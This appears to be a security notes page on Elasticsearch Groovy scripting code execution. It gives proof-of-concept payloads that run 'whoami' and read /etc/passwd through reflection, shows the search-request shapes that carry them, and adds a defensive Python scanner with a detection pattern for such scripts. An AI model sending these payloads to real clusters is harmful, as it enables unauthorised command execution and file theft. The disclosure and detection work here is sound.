Elasticsearch scripting security issues
Elasticsearch scripting:
http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html
Security issues:
http://www.elasticsearch.org/community/security/
POC:
Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText()
super.class.toString().valueOf('whoami').execute().getText()
http://zone.wooyun.org/content/18915
{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}
{
  "size": 1,
  "query": {
    "function_score": {
      "script_score": {
        "script": "POC............",
        "lang": "groovy"
      }
    }
  }
}

{
  "size": 1,
  "script_fields": {
    "my_field": {
      "script": "POC.........."
    }
  }
}
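
The two request shapes above carry a client-supplied script in `script_fields` or in `function_score.script_score`. As an added example (not part of the original page), this defender-side check walks a `_search` request body and reports every inline script, raising the severity when it contains method names seen in the PoC strings above. The function names and sample bodies are constructed for illustration, and only the string form of `script` shown on this page is handled.

```python
import json
import re

# Method names that appear in the PoC strings on this page (reflection, process execution).
SUSPICIOUS = re.compile(
    r"\b(forName|getRuntime|exec|execute|getConstructor|newInstance)\s*\("
)

def find_scripts(node, path=""):
    """Yield (json_path, source) for every string-valued "script" key in a parsed body."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}" if path else key
            if key == "script" and isinstance(value, str):
                yield child, value
            else:
                yield from find_scripts(value, child)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from find_scripts(item, f"{path}[{i}]")

def audit_search_body(raw):
    """Return one finding per inline script in a _search request body (JSON text)."""
    try:
        body = json.loads(raw)
    except ValueError:
        return [{"path": None, "severity": "unparseable", "tokens": []}]
    findings = []
    for path, source in find_scripts(body):
        tokens = sorted(set(SUSPICIOUS.findall(source)))
        # Any client-supplied script is reported; known tokens only raise the severity.
        severity = "high" if tokens else "review"
        findings.append({"path": path, "severity": severity, "tokens": tokens})
    return findings

# Constructed sample bodies in the two shapes shown above, plus a script-free query.
SAMPLES = {
    "script_fields": json.dumps({"size": 1, "script_fields": {"my_field": {
        "script": 'Math.class.forName("java.lang.Runtime").getRuntime().exec("whoami").getText()'}}}),
    "function_score": json.dumps({"size": 1, "query": {"function_score": {
        "script_score": {"script": "_score * 2", "lang": "groovy"}}}}),
    "no_script": json.dumps({"size": 1, "query": {"match_all": {}}}),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, audit_search_body(raw))
```

The token list is a heuristic that renamed or string-built calls will not match, which is why every inline script is reported and the tokens only change the severity.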